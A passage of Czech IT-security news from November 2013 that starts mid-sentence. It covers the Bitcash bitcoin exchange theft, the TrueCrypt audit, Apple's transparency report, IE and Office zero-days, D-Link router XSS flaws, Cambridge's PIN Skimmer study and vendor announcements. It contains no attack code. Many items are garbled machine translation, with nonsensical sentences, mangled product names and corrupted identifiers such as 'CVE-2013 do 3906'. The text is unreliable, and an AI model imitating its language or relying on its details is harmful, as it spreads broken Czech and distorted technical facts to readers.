Miller a Narayanan říci, že když to bude pravděpodobně trvat nějaký čas, aby určili, zda jejich širší nároky na papíře Cornell jsou přesné, se domnívají, že základní předpoklad, že kartel menšina nezletilých mohli vydělat víc než jeho splatnosti příjmů je pravděpodobně platné.
"Předpoklad, že X% z hashpower nemohou vydělávat více než X% příjmů je téměř jistě není pravda, jednou X% vyšší než 33,3%," říkají vědci.
Českou burzu Bitcash napadli hackeři a ukradli všechny bitcoiny
12.11.2013 Kriminalita | Hacking
Hackerům se podařilo v pondělí prolomit zabezpečení české burzy Bitcash.cz, která prostřednictvím svých internetových stránek provozovala peněženky s virtuální měnou bitcoin, a odcizit všechny prostředky. Bitcash to uvedl na svých stránkách.
O bitcoinech
Na bitcoinu je založena řada legálních investičních fondů a obchoduje se s ním na specializovaných burzách. Měnu již také přijímají některé obchody. Bitcoin vytvořil v roce 2009 anonymní vývojář používající pseudonym Satoši Nakamoto. Je navržen tak, aby ho nikdo nemohl jakkoli ovlivňovat, tedy ani vlády a centrální banky.
Ještě zhruba v polovině loňského roku stál jeden bitcoin pouhých sedm dolarů. Začátkem letošního roku zaznamenala měna silný růst, později se však vývoj jejího kurzu dočasně obrátil kvůli technickým problémům při obchodování.
„Dne 11. listopadu ve večerních hodinách bylo prolomeno zabezpečení serveru. Bohužel, noční můra se stala skutečností. Řešíme způsob útoku, zabezpečení a co můžeme dál podniknout,“ píše se na webu Bitcash.cz.
Kdo za útokem stojí, se zatím nepodařilo zjistit. „Momentálně podáváme trestní oznámení na neznámého pachatele,“ konstatovali tvůrci webu.
Podle serveru E15.cz česká burza Bitcash v minulosti spravovala zhruba čtyři tisíce virtuálních peněženek a bitcoiny v hodnotě za více než dva milióny korun. Hodnota kybernetické měny bitcoin se počátkem tohoto měsíce vyšplhala na nové rekordní maximum kolem 251 dolarů (zhruba 5000 Kč).
Nájezdy na bitcoinové peněženky nejsou ojedinělé
Nájezdy kybernetických pirátů na bitcoinové systémy nejsou vůbec ojedinělé. Na konci října se jim například podařilo odcizit z britské internetové peněženky inputs.io bitcoiny v celkové hodnotě přes 26 miliónů korun.
„Zatímco v běžné bance by byly vklady ze zákona pojištěné, v tomto případě pravděpodobně všichni střadatelé o své peníze jednoduše přišli a záleží pouze na nich a provozovateli, jak se k celé věci postaví,“ podotkl Jakub Čížek ze serveru Živě.cz.
TrueCrypt projít crowdfunded, veřejné bezpečnostní audit
12.11.2013 Šifrování | Ochrana
Po všech těch odhalení o špionáž efforts NSA, a to zejména po zveřejnění informací o jeho Bullrun programu zaměřeného na podrývání šifrovacích standardů a úsilí po celém světě, je vznesena otázka, zda nějaký šifrovací software, se dá věřit.
Bezpečnostní experti opakovaně uvedla, že chcete důvěřovat tento typ softwaru, je nejlepší vybrat si software, který je open source. Ale, aby bylo zcela jist, bezpečnostní audit kódu nezávislými odborníky zní jako definitivní odpověď na tuto otázku. A to přesně to, co Matthew Green, cryptographer a výzkumným pracovníkem na Johns Hopkins univerzitě, a Kenneth White, vedoucí vědecký pracovník na sociální a vědecké Systems, které si stanovili. software, který bude audit je slavný souborů a šifrování disku software TrueCrypt. K dispozici pro Windows, Linux a OS X, je uživatelsky přívětivý software vyvinutý neznámých vývojářů a doposud nikdy nebyly auditovány pro úmyslné či neúmyslné bezpečnostní chyby. Aby bylo možné financovat auditu projektu , zelená a bílá začali fundraising na FundFill a IndieGoGo a dosud zvýšil více než 50.000 dolarů celkem. Cílem projektu je několik:
K implementaci deterministických / reprodukovatelné staví, aby se ujistili, že softwarové binární soubory nebyly porušeny.
Chcete udělat kompletní zdrojový kód audit provedený společností bezpečnostní hodnocení, který je kvalifikován přezkoumat šifrovací software.
Chcete-li právní revize licence k softwaru, a zjistit, zda existuje způsob, jak umožnit, aby TrueCrypt být dodáván spolu s mnoha z populárních linuxových distribucí.
Zelené a bílé doufají, že společnost, která přijímá udělat audit bude také darovat své doby zaměstnanců nebo snížit sazby pro tento projekt, stejně jako, že budou mít dost peněz, aby odměňoval chyb lovci, kteří se zapojili. "Nemáme" t očekávat, že každý jednotlivý člověk udělat vše. Přesné vyvážení výplaty z našeho shromažďují fondu je stále TBD, ale budeme formalizovat to brzy. Chceme také, specialisty a odborníky, a také chceme, aby lidé věnovali svůj čas tam, kde je to možné, "uvedli. "" problém "s TrueCrypt je stejný problém, který máme s jakýmkoliv populární bezpečnostní software v post-září-5 éry: nevíme, co už věřit, "Green vysvětlil v blogu. "Ale upřímně řečeno, existují i jiné věci, které se starají o mě TrueCrypt. Největší z nich je, že nikdo neví, kdo to napsal. " Také proto, že tam byly nějaké náznaky, že spustitelný soubor Windows TrueCrypt 7.0a je sestaven z jiného zdrojového kódu, než ve které je publikováno. "I v případě, že zdrojový kód je Truecrypt důvěryhodný, není žádný důvod se domnívat, že je binárka. A mnoho, mnoho lidí jen setkat TrueCrypt jako binární Windows, "podotkl. "Ve zkratce:. Existuje celá řada důvodů, proč musíme prověřit tento software - a pohybovat jeho proces vytváření bezpečného, na deterministický základ" Podle nejnovější aktualizace, mají kontaktoval (anonymní) TrueCrypt vývojového týmu, kteří vyjádřili svou podporu úsilí. "Oni to požádat, připomínáme komunitu (a kolegové vědci) na modelu TrueCrypt zabezpečení a související nástrahách, co software dělá a nezaručuje dělat, "oni si všimli.
Apple vydal chytře orámovaný zprávu o žádostech o vládních údajů
12.11.2013 Zákony
Apple vydal to, co bude první z mnoha pololetních zpráv o žádostech vládních informací, které obdržela, a zahrnoval prohlášení, že "Apple nikdy nedostal rozkaz podle § 215 zákona USA PATRIOT Act", a dodal, že by se očekávat, že napadnout takový příkaz, pokud se podává na ně.
Význam prohlášení nebydlí v jeho pravdivosti, neboť i když společnost obdrží takový příkaz ze zákona vyloučen z výslovně zveřejnění nebo potvrzení skutečnosti. Místo toho, jeho význam se ukázalo, pokud vůbec, v budoucnu, je tvrzení spadl ze zprávy. Tímto způsobem Apple bude moci signál pro uživatele, které se zobrazí jedna nebo více takových příkazů, ale nebude porušovat zákon výslovně potvrzením. Zbytek zprávy - což zahrnuje údaje za první pololetí roku 2013 - Je zajímavý tím, že dává nahlédnout do vlády, která požádala Apple zveřejnila informace o uživatele nebo zařízení, a jak společnost reagovala na tyto žádosti po pečlivém přečtení těchto dokumentů. Společnost vysvětlila, že drtivá většina žádostí, které obdrží od donucovacích orgánů vyhledávat informace o ztrátě nebo odcizení zařízení, a jsou obvykle vyrobeny když Apple zákazníci požádat policii, aby jim pomohla s ztraceného nebo ukradeného iPhone nebo při vynucování práva byla obnovena zásilku odcizených přístrojů. "Pouze malá část žádostí, že Apple dostane hledat osobní údaje vztahující se k iTunes, iCloud nebo Game Center účtu. Účet na bázi žádosti se obvykle týkají osobního účtu držitele údajů a jejich využití pro on-line služby, ve kterém mají očekávání soukromí, jako státní žádostí o identifikační údaje zákazníka, e-mailem, uložené fotografie nebo jiného uživatelského obsahu uloženého on-line ", které dále jasně. Společnost zaznamenává oba typy žádostí, ale rozlišuje kategorie. "Zařízení požaduje po zahrnují vnitrostátní bezpečnostní požadavky související s" poukazují. Zatímco tabulka týkající se informace o zařízení poskytuje zajímavý pohled do země, jejíž síly činné v trestním řízení jsou pravděpodobně při vydávání ukradených zařízení více k srdci, tabulku s podrobnostmi o informace o účtu požaduje poskytuje detailnější pohled na to, co vládní agentury jsou po a to, co se jim nakonec si (kliknutím na screenshot pro zvětšení): : To je zajímavé poznamenat, že v tomto případě se počet žádostí v USA je zcela zjevně mnohem větší, že z jiných zemí, a to vzhledem k právním omezením, může přesný počet nelze sdílet. "Americká vláda nám dala svolení ke sdílení jen omezené množství informací o těchto objednávek s požadavkem, aby se spojit národní bezpečnosti objednávky s Účet na bázi výkon práva a hlásí pouze konsolidovanou nabídku v krocích po 1000, "oni si všimli. "Mezi nejčastější účet žádosti zapojit loupeží a jiné zločiny nebo žádosti policistů hledání pohřešovaných osob nebo děti, najít únos oběť, nebo doufat, aby se zabránilo sebevraždu. Reakce na účtu žádost obvykle zahrnuje poskytování informací o majitele účtu iTunes nebo iCloud účtu, například jméno a adresu. Ve velmi vzácných případech, jsme požádáni o poskytnutí uložené fotografie nebo e-mailu. " Společnost se ujistěte se, že poukazují na opakovaně, že každý požadavek je pečlivě přezkoumána jeho právní tým. A v tom, co lze chápat jako kopnutí u jiných tech gigantů, jako jsou Facebook, Google a Microsoft dodal, že jejich podnikání nezávisí na shromažďování uživatelských dat. "Nemáme zájem na hromadění osobních informací o našich zákazníků," řekli , a dodal: "Jsme ochraně osobních rozhovorů tím, že poskytuje end-to-end šifrování přes iMessage a FaceTime. Nechceme ukládat údaje o poloze, Mapy vyhledávání, nebo Siri požadavky v jakékoliv identifikovatelné podobě. "
Většina návštěv na přihlašovací stránce jsou škodlivými nářadí
12.11.2013 Viry | Phishing
Incapsula průzkum 1000 webové stránky za 90denní období, kdy jsme zaznamenali více než 1,4 milionu neověřených pokusech o přístup a 20.376 ověřené přihlášení. Jejich údaje ukazují, že 2,8% z neověřených pokusy byly provedeny lidské návštěvníky. To naznačuje, že většina z nich by měla být připsána na "selhání lidského faktoru" (např. zadáním nesprávné heslo), a na počáteční jednorázové 2fa procesu aktivace.
Čísla také ukazují, že další 1,8% z neověřených návštěvy byly provedeny benevolentní roboty (např. vyhledávače, legitimní roboti, RSS čtečky, atd.), jejichž počet by byl jistě mnohem vyšší, kdyby nebylo běžnou praxí, že blokuje přihlášení . URL pomocí souboru robots.txt Zbývajících 94.1% návštěv byly zlými úmysly automatizovaných nástrojů - druhů, které se používají k objevování a využívání heslo související bezpečnostní díry. Jednoduše řečeno to znamená, že v průměru 15 každých 16 návštěvníků na vaše přihlašovací stránky mají nemocné pozornost v mysli.
Zdánlivě vysoký podíl škodlivých návštěv je ve skutečnosti, všichni ale očekává, že - zejména s ohledem na nedávné vlny rozsáhlých útoků hrubou silou a celkový nárůst APT akcí a jiných heslo souvisejících udělátek. této souvislosti je ještě patrnější z pohledu na trendů zpráv. Například, při dodržení časové ose blokovaných pokusů, je snadné rozpoznat zřetelný vztah mezi prudkým zvýšením počtu škodlivých pokusech o přístup a zprávy o napadení Fort Disco, který se vynořil celý srpen a září.
Nový Microsoft 0-day zranitelnost pod útokem
12.11.2013 Zranitelnosti
Společnost Microsoft vydala informační zpravodaj zabezpečení KB2896666 , které informuje o zranitelnosti (CVE-2013 do 3906) ve formátu TIFF grafiky, který je vidět omezené útoky na Blízkém východě av jižní Asii. Tato chyba se vyskytuje v Microsoft Office 2003, 2007 a 2010 a některé starší operační systémy Windows, a v současné době pozorovat útoku je prostřednictvím dokumentů aplikace Microsoft Word. Společnost Microsoft poskytla Fix-It, který vypne TIFF vykreslování do postiženého grafickou knihovnu, která by neměla mít žádný vliv, pokud nejste v práci s soubory ve formátu TIFF na pravidelném základě. Uvedené softwarové balíky nejsou ohroženy za všech podmínek, takže Je důležité, aby jste se podívat na vaše instalované základny a své možné expozici pro příštích pár týdnů do prosince. Vzhledem k blízkosti datum příštího Patch Tuesday v listopadu, nevěříme, že se můžeme spolehnout na kousku dorazí včas, asi budeme muset počkat až do prosince, což váš plánování pro obejití ještě důležitější. Microsoft proaktivní zabezpečení toolkit EMET (Enhanced Experience Toolkit Zmírnění) zabraňuje útoku z provedení, stejně jako některé z Office 2010 bezpečnostní opatření, jako ochranného módu. Společnost Microsoft poskytla další informace v tomto blogu na svůj blog SRD. McAfee zveřejnila blogu poskytuje další podrobnosti o útoku prostřednictvím úřadu a jak se projevuje na napadení počítače. Autor: Wolfgang Kandek, CTO, Qualys.
IT vůdci o stavu výdajů na IT
12.11.2013 IT
Nový výzkum ukazuje rostoucí optimismus v krajině technologií výdajů. Téměř 900 IT vůdců (CIO, IT VPS, IT ředitelé, IT náboráře) byl zavolán TEKsystems v září 2013 o současném stavu IT výdajů, kvalifikačních potřeb pracovních sil a problémy, stejně jako očekávání na rok 2014.
Důvěra v zvýšenými výdaji a schopnost plnit požadavky jsou vysoké:
IT vůdci jsou mimořádně jisti stability nebo růst rozpočty na IT. Osmdesát osm procent očekávají, že jejich organizace IT rozpočet zůstane stejná nebo vzroste, přičemž 62 procent očekává pozitivní růst. Pouze 12 procent očekává pokles. V roce k meziročnímu srovnání těch očekával růst se zvýšil z 48 procent na 62 procent, zatímco u očekávají poklesy snížil z 16 na 12 procent.
IT vůdci jsou důvěru ve své schopnosti uspokojit obchodní požadavky. Celkově v průměru o 66 procent vedoucích pracovníků věří ve své schopnosti uspokojit nároky v celé řadě oblastí. Operace se řadí nejvyšší spolehlivosti (80 procent), následují finance (69 procent), lidských zdrojů (63 procent), prodej (60 procent) a marketing (59 procent). V roce k meziročnímu srovnání, které vyjadřují celkově důvěra vzrostla z 54 na 66 procent, zatímco ti, kteří postrádají důvěru snížila z 16 procent na 6 procent.
Úspěch závisí na základní dovednosti a jejich vůdci jsou ochotni platit:
Hands-on pozicích jsou klíčem k úspěchu, než vedení. Když byl dotázán, které role jsou nejdůležitější pro úspěch organizace, IT vedoucí postavení v pořadí pět nejlepších rolí jako programátory a vývojáře, projektoví manažeři, help desk a technickou podporu, softwarové inženýry a architekty. Top 10 Odpovědi byly završeny v daném pořadí, s výkonnými vedoucími, VP a ředitelé, obchodní analytiky, IT manažery a account manažeři.
Výjimečný talent v kritických schopností, je těžké najít, věnovat se zvyšuje odpovídat nedostatek. První tři nejtěžší role IT najít výjimečný talent, v pořádku, je programování a vývoj, architekti a softwaroví inženýři. V odborné oblasti, které obdržely nejvyšší celkovou pozitivní očekávání na zvýšení platu byl programátoři a vývojáři, softwaroví inženýři, vedoucích projektů a architektů, což naznačuje, že lídři si uvědomují, poptávka po těchto dovednostech.
Výdajových oblastech jsou vzájemně závislé:
BI a Big dat udržení první místo. Business Intelligence (BI) a velkých objemů dat, bezpečnost, mobilní, cloud computing a virtualizace byla hodnocena jako pět nejlepších trendů, které mohou mít největší organizační dopad. Ve srovnání s předchozím rokem, BI a Big Údaje zůstal v horní pozici, zatímco bezpečnostní posunul ze třetího místa na druhé mobilní posunul ze čtvrtého na třetí a cloud computing klesl z druhého do čtvrtého. Zajímavé je, že virtualizace posunul z sedmého-páté.
Dominový efekt se vyskytuje u výdajů na IT. Horní dvě oblasti, kde přibližně 60 procent IT vůdců očekávat celkové pozitivní změny ve výdajích jsou mobilní (62 procent) a cloud (59 procent), což by přispělo k bezpečnosti (59 procent), umístění mezi prvními třemi. Navíc, BI a Big data umístěna celkově pátý (51 procent), která může vozidlo ujelo skladování (57 procent) do čtvrtého nejvyšším místě.
Platy na vzestupu, pronájem roste podobným tempem v celé modelů zaměstnanosti:
IT vůdci Prepping platové struktury, aby zvýšení. Pokud jde o náhradu škody, procento IT vůdců, kteří očekávají zvýšení platů zaměstnanců vzrostl z 55 procent na 81 procent, přičemž 71 procent očekává plat změny až 5 procent. Ti očekávají platy zůstat stejný nebo pokles ubylo z 38 procent na 19 procent meziroční nárůst.
Bez ohledu na dovednosti prostoru, většina IT vůdců očekávat nějaké zvýšení platu. Skupiny, kde alespoň 60 procent IT vůdců očekávat zvýšení platu jsou programátoři a vývojáři (69 procent), softwaroví inženýři (67 procent), projektoví manažeři (67 procent), architekti (65 procent), bezpečnost (65 procent), obchodní analytici (63 procent), mobilní (62 procent) a BI a Big Data (60 procent). Za nimi následuje oblak (58 procent), help desk a technickou podporu (56 procent) a sociální média (50 procent).
Organizace pronájem v zrcadlově, kombinované studium. Podle průzkumu, přibližně jeden ze čtyř IT pracovníci jsou podmíněné pracovníků. Pronájem sazba pro každý typ pracovníka se očekává růst na téměř stejnou rychlostí, s 47 procent IT vůdců očekává počet stálých najme zvýšit ve srovnání s 46 procent IT vůdců očekávají dočasné najme zvýšit.
"Ve srovnání s loňským rokem, IT vůdci situace významně změnila své vyhlídky na pozitivní celkově v IT přidělené rozpočtové prostředky, jakož i jejich očekávání pro přijímání a plat se zvyšuje," říká vedoucí výzkumu TEKsystems Jason Hayman. "Nejzajímavější je, že se zdá, že větší poptávka po základních dovednosti programování a vývoj aplikací a softwarového inženýrství. IT vůdci ukazují výjimečný talent se stala těžší najít v těchto oblastech a přizpůsobily své strategie podle plat. "
SafeToGo USB 3.0 flash disk hardwarovým šifrováním propuštěn
12.11.2013 Šifrování | Hardware
Cardwave spolupracuje s BLOCKMASTER vyrábět novou generaci vysoce zabezpečených USB disků kompatibilních 3.0 Flash. Nové zařízení bude obvykle pracovat na 2 až 3 krát rychleji než konvenční zařízení USB 2.0.
SafeToGo splňuje požadavky na zabezpečení pro organizace, které používají USB flash disky pro přepravu důvěrných dat. Nabízí podnikové třídy bezpečnosti se 100% hardwarové šifrování a ochranu heslem. Přístroj může být také plně spravované prostřednictvím serveru SafeConsole BLOCKMASTER, který byl inovován, aby zahrnovala podporu pro ShieldShare -. Bezpečné sdílení souborů řešení pro firmy "Bezpečnost dat by mělo být nejvyšší prioritou, když zaměstnanci manipulaci a cestování s citlivými informacemi. To se stává samozřejmostí přečíst o závažných případů ztráty dat nešifrovane jsou USB zařízení v omyl pracovníky a organizace jsou vystaveny nejen komerčně poškození únikem informací, ale významné pokuty, které mohou být tisíce liber, "říká Paul Norbury, Cardwave CEO. Jeho komentář přišel poté, co se některé články v posledních letech podrobně Katastrofální důsledky porušení v oblasti bezpečnosti dat a důsledek nepoužíváte šifrované USB disky. "Organizace mohou ztratit kontrolu umístění a zabezpečení svých dat velmi rychle. Z tohoto důvodu je nezbytné, aby společnosti nasadit správné řešení a využití hardwarové šifrované flash disky, které se opírají o komplexních bezpečnostních strategií, "uvedl Norbury.
Kaspersky Small Office Security aktualizace
12.11.2013 Zabezpečení | Ochrana
Kaspersky Lab oznámila novou verzi aplikace Kaspersky Small Office Security, bezpečnostní řešení postavené speciálně pro podniky s méně než 25 zaměstnanci. Toto řešení obsahuje nové funkce, které pomáhají malým podnikům udržet si náskok před moderních bezpečnostních výzev.
Podle IDC odhaduje, že více než 75 milionů podniků po celém světě, které pracují s méně než 10 zaměstnanci. Tyto "velmi malé a střední podniky" bude zpracovávat miliony, ne-li miliardy, dolarů v roce 2014. Přesto tento segment již tradičně pod-sloužil IT výrobců bezpečnostních řešení, které nenabízejí produkty s těmito podniky v mysli. Kaspersky Small Office Security obsahuje nové funkce, a řadu technologických vylepšení a vylepšení, včetně: Bezpečné peníze na ochranu on-line bankovnictví - automatickou aktivací nové vrstvy ochrany, pokud jsou uživatelé provádějící finanční transakce on-line, mohou podniky nyní platit faktury, provádět nákupy a přístup k on-line finančních dat s klidnou myslí. Kaspersky Lab Oceněná Bezpečné peníze technologie automaticky aktivuje ultra-bezpečný webový prohlížeč, když uživatel navštíví finanční stránky, jako je například online k bance nebo platební služby. Bezpečné peníze prohlížeč zajišťuje žádné neautorizované programy mohou běžet a na obrazovce data jsou chráněna před keyloggery a screen-capture malware. Bezpečné peníze budou také ověřit, že webové stránky jsou uživatelé připojeni k je závazné a má platnou certifikaci porazit pokusy o phishing, a neustále monitoruje připojení, aby informace nebyly zachyceny zločinci. Vylepšená podpora mobilních zařízení - Malé a střední podniky nejsou imunní vůči Výzvy chránit mobilní pracovní síly a rychle rostoucí BYOD trendy. Kaspersky Small Office Security nyní obsahuje podporu pro tablety a smartphony Android, vybavení těchto zařízení s řadou anti-malware, prohlížení webových stránek, ochrana soukromí a ovládacích prvků. Nejdůležitější je, že tato zařízení mají nyní Kaspersky Lab nejnovější anti-krádež technologie umožňuje zaměstnancům najít chybějící mobilních zařízení, nebo vzdáleně vymazat data z odcizených mobilních telefonů. Automatické Exploit Prevention - Tato jedinečná technologie zabraňuje počítačovým zlodějům ve vznikající zranitelností ve legitimní software , obyčejně známý jako nula dní, aby zahájily útoky škodlivého softwaru. Tím aktivně sleduje chování běžně využíván software, jako je Adobe a Java, nebude automatické Exploit Prevention chránit zákazníky před neobjevených činů a zajistit zákazníkům jsou chráněny iv případě nejnovějších aktualizací svých programů zákonem dosud nebyly nainstalovány. Správce hesel - Secure hesla jsou základem pro bezpečnou práci s počítačem, a přesto až příliš často, že uživatelé přijmout výhodnější možnosti pomocí jednoduchých hesel, opětovného použití stejné heslo pro více účtů, nebo vedení seznamu svých hesel na papír vedle jejich stolu. Pomocí správce hesel, mohou zaměstnanci dostat zpátky na trať s dobrými návyky heslem, a potřebují zapamatovat jediné "hlavní heslo". Kaspersky Password Manager bude ukládat hesla v šifrované klenby, a automaticky vyplnit v správné heslo v případě potřeby. To může také vytvářet vlastní zabezpečení hesel pro nové účty, aby zaměstnanci nebudou v pokušení znovu použít existující hesla a umožňuje zaměstnancům vytvořit bezpečné přenosnou verzi své heslo trezoru na USB disk. Online zálohování - Malé a střední podniky mohou nyní automaticky uložit svá kritická data bezpečně na oblaku nebo na místním pevném disku nebo serveru. Tím, že proces zálohování jednodušší, mohou malé a střední podniky být jisti, že jejich nejdůležitější podnikatelské plány, finanční záznamy a údaje o zákaznících zůstanou přístupné v případě poruchy zařízení nebo náhodným vymazáním.
IE zero-day zranitelnost Využití Msvcrt.dll
12.11.2013 Zranitelnosti
FireEye Labs objevil exploit ", která využívá nový informační úniku zranitelnost IE a out-of-bounds memory access zranitelnosti k dosažení spuštění kódu." [1] Na základě jejich analýzy, se týká IE 7, 8, 9 a 10.
Podle společnosti Microsoft, lze tuto chybu zabezpečení lze zmírnit Emet. [ 2 ] [ 3 ] Další informace o FireEye Labs funkce k dispozici zde .
Aktualizace : FireEye Labs poskytla doplňující informace o nedávno objevené IE zero-day exploit, který je v současné době ve volné přírodě a byl jmenován Trojan.APT.9002 (aka Hydraq / McRAT varianta). Oni vydali další informace o Trojan, který běží jen v paměti a nechat jen velmi málo artefaktů, které mohou pomoci identifikovat nakažené klienty. Další informace o Trojan lze nalézt zde , který také obsahuje seznam domén, MD5 hashi a User-Agent informací.
Update 2 : Microsoft vydává zítra opravu této chyby (CVE-2013 - 3918), které ovlivňují Explorer ActiveX Control "Věstník 3" MS13-090 uvedených v listopadu Microsoft Patch Preview úterý .
[1] http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html
[2] https://isc.sans .edu / forums / Deník / EMET 40 + je + + nyní k dispozici + pro + download/16019
[3] http://www.microsoft.com/en-us/download/details.aspx?id=39273
[4 ]
Útok na novou zranitelnost v IE probíhá z RAM
12.11.2013 Zranitelnosti | Hrozby
Kyberzločinci využívají ke svým útokům nově objevenou zranitelnost v prohlížeči Internet Explorer, na niž zatím neexistuje žádná oprava. Malware je uložen jen v RAM, po restartu počítače tedy zmizí.
Nový balík aktualizací, který Microsoft i tento týden, stejně jako každé druhé úterý v měsíci v rámci tzv. Patch Tuesday zpřístupnil uživatelům svých produktů, přináší hned několik zajímavostí. Osm záplat opravuje kritické chyby ve Windows a všech verzích webového prohlížeče Internet Explorer od IE6 až po IE11. Chyby v kancelářském balíku Office, Windows a platformě Lync, jež Microsoft zveřejnil minulý týden, opraveny bohužel nebudou – zatím však stále není jasné, zda budou opraveny nejnovější chyby v Internet Expoloreru, o nichž minulý týden přinesla informace společnost FireEye. Podle této bezpečnostní firmy jsou útoky s využitím nově objevených slabin IE prováděny z amerických webových stránek pomocí pokročilé techniky, jež vkládá škodlivý kód přímo do paměti a ohrožuje tak uživatele IE7, 8, 9 a 10 v operačních systémech Windows XP a Windows 7.
Podle FireEye byly útoky prováděny z webových stránek hostovaných ve Spojených státech a zaměřovaly se na lidi pracující v tamním zbrojním průmyslu. „Útočníci vložili zneužití nové chyby do velmi důležité webové stránky, o níž se ví, že ji navštěvují lidé zajímající se o národní a mezinárodní bezpečnostní politiku,“ napsali v neděli Ned Moran, Sai Omkar Vashisht, Mike Scott a Thoufique Haw z FireEye. Stránku však ve svém příspěvku nejmenovali. Podle nich jsou zločinci, kteří stojí za tímto novým útokem, zodpovědní také za průnik do systémů bezpečnostní společnosti Bit9, jež se odehrál dříve v tomto roce, a s největší pravděpodobností také podnikli za pomocí nové chyby v IE nedávné útoky na japonské cíle.
Kyberzločinci podle všeho využívají nejmodernější metody a techniky obdobné těm, jež podle společnosti Mandiant používala čínská hackerská skupina známá jako AP-1, která se zaměřuje zejména na americké cíle. Útoky zločinců běžně probíhají tak, že jsou jejich škodlivé kódy nainstalovány do počítače a spouští se stále znovu (dokud je někdo neodstraní) i po restartu zařízení. Ne tak nový červ zneužívající IE, jehož FireEye pojmenovalo jako Trojan.APT.9002. „Útočníci nahráli kód přímo do paměti bez zápisu na disk, což je technika, která se příliš nepoužívá. Bezpečnostní společnosti díky tomu budou mít problém za pomoci běžných forenzních metod vystopovat, odkud útočníci červy opravdu řídí.“
Útočníci se tak v tomto případě očividně rozhodli vyměnit možnost ovládání počítačů obětí po delší dobu za větší jistotu toho, že jejich identita zůstane skryta. Postup dále svědčí o tom, že jsou si jisti tím, že budou moci rychle získat kontrolu nad systémy obětí. Microsoft zatím na zjištění FireEye nereagoval a není tak jisté, kdy vydá pro svůj webový prohlížeč opravu.
PIN telefonu lze odhalit pomocí foťáku a mikrofonu
12.11.2013 Mobil | Zabezpečení
Vědci varují před nedostatečnou ochranou chytrých telefonů.
Týmu vědců z Cambridgeské univerzity se prostřednictvím nástroje nazvaného PIN Skimmer podařilo rozpoznat kód, kterým uživatelé aktivují svá zařízení.
„Zjistili jsme, že kameru, kterou lidé obvykle používají pro konferenční hovory nebo rozpoznávání obličeje, lze snadno zneužít,“ píší ve své zprávě autoři studie Ross Anderson a Laurent Simon.
Tohoto faktu využívá i program PIN Skimmer, který přes fotoaparát sleduje uživatelův obličej a pomocí mikrofonu zaznamenává zvuky při každém stisku dotykové klávesnice na displeji. Díky tomu program následně odhadne orientaci telefonu a přiřadí jednotlivé zvuky konkrétním číslicím.
„Jednoduše sledujeme, jak se váš obličej pohybuje při psaní na klávesnici. Sami jsme byli překvapeni tím, jak dobře to funguje,“ řekl Ross Anderson, který v Cambridge působí jako profesor bezpečnostních technologií.
Vědci svou technologii testovali na chytrých telefonech Google Nexus-S a Galaxy S3. Při zjišťování čtyřmístného kódu PIN byl program v 50 % případů úspěšný již po provedení pěti pokusů. U osmimístných přístupových kódů dosáhl 60% úspěšnosti po 10 pokusech.
Většina uživatelů používá kódy PIN k zamykání a odemykání svých telefonů. Stále častěji však tímto způsobem přistupují také k některých aplikacím, například do internetového bankovnictví. To vyvolává otázku, jestli by nemělo dojít k dočasnému zablokování některých funkcí telefonu při zadávání důležitých kódů.
„Například u příchozího hovoru potřebuje uživatel slyšet vyzvánění i ve chvíli, kdy odemyká svůj telefon, jinak by si mohl myslet, že volající zavěsil,“ píší vědci ve své zprávě.
Jedním z možných řešení je používání delších přístupových kódů. Tím by se však zhoršila jejich zapamatovatelnost a tedy i použitelnost. Jinou možností je náhodné rozložení čísel na klávesnici, což by ale podle vědců opět narušilo uživatelský komfort. Pak už ovšem zbývají jen otisky prstu nebo hlasová identifikace.
Vůbec nejdůležitější však podle vědců je, aby si byli vývojáři při vytváření aplikací tohoto rizika vědomi.
D-Link Router ohrožená Cross-Site Scripting
11.11.2013 Hacking | Zranitelnosti
D-Link DSL-2760N (2760U-BN) routery údajně obsahují řadu uložených a reflexní cross-site scripting (XSS zranitelnosti).
Výzkumník Liad Mizrachi řekl, že kontaktoval D-Link zveřejnit podrobnosti o chybách, které jim ze šesti různých příležitostech - dvakrát v srpnu, dvakrát v září a poté v říjnu - ale to, že prodejce nereagoval na žádné z odhalení. Threatpost natáhl D-Link k připomínkám, ale neodpověděl na žádost před zveřejněním.
Rozmanité chyby jsou přítomny v různých částech routeru Web uživatelského rozhraní.
Podle umístění na Plný seznam zpřístupnění Poštovní , se 2760N routeru XSS chyby existují v nastavení NTS, rodičovskou kontrolu, filtrování URL adres, NAT spouštěč portu, IP filtrování, rozhraní seskupení, jednoduché síťové řídící protokol, vstupní filtr IP policy routing, tiskový server, SAMBA konfigurace a Wi-Fi SSID webové rozhraní, resp.
Tyto chyby postupujte závažnější zranitelnost backdoor, který se objevil minulý měsíc a mohl dát útočník možnost přístupu k postiženým směrovače a provádět žádnou akci mu zlíbilo. D-Link je údajně v procesu záplatování této chybě.
IE Zero Day Zalévání díry útok Injects zlomyslným užitečným zatížením do paměti
11.11.2013 Zranitelnosti
Microsoft může být slibný relativně lehký Patch Tuesday uvolnění zítra, ale to neznamená, že její výzkumníci a vývojáři nebudou mít plné ruce práce. Nejen, že je zaneprázdněn Microsoft na opravu pro denní TIFF nulovou chybou hlášené před dvěma týdny, ale teď další dříve nehlášeného Internet Explorer chyba přistál na frontě.
Minulý pátek, vědci FireEye hlášeny nové zalévání děr útok proti jedné nejmenované americké společnosti nevládní organizace (NGO), hosting webových stránek vnitrostátní a mezinárodní politické vedení. FireEye ředitel hrozbách Darien Kindlund řekl, že je stále nejasné, jak útočníci ohrožena webové stránky. Kód zneužití je cílení na novou chybu v IE a napadení oběti pomocí drive-by download. Které využívají zaměřuje na informační úniku chybu, stejně jako paměť problém v IE, která umožňuje vzdálené spuštění kódu. Různé verze IE v systému Windows XP a Windows 7 mají vliv těchto útoků, které mohou být zmírněny tím, Enhanced Microsoft zmírňování Experience Toolkit (EMET), FireEye řekl.
Užitečné zatížení varianta McRAT Trojan-je vstřikováno přímo do paměti dělat detekce a soudní vyšetřování výzvou. FireEye také navázání spojení mezi těmito útoky, což je volání operace pomíjivé Hydra a starší DeputyDog útoku. DeputyDog, tak pojmenovaný po sérii nalezené v útoku kódu, se vynořil v září, a to pouze v době, kdy k řadě populárních japonských médií stránky. Malware byl zvyklý na špionáž , krádeže dokumentů a systémových dat z počítačů patřících do vlády, high-tech a výrobních firem v Japonsku. Kindlund řekl, že není jasné, jaké typy informací jsou odcizen v této současné kampani.
"Na základě naší viditelnosti do této hrozbě herce cílení se zdá, že hrozba herec má zájem průmyslu zvláštních zpravodajských služeb," řekl Kindlund.
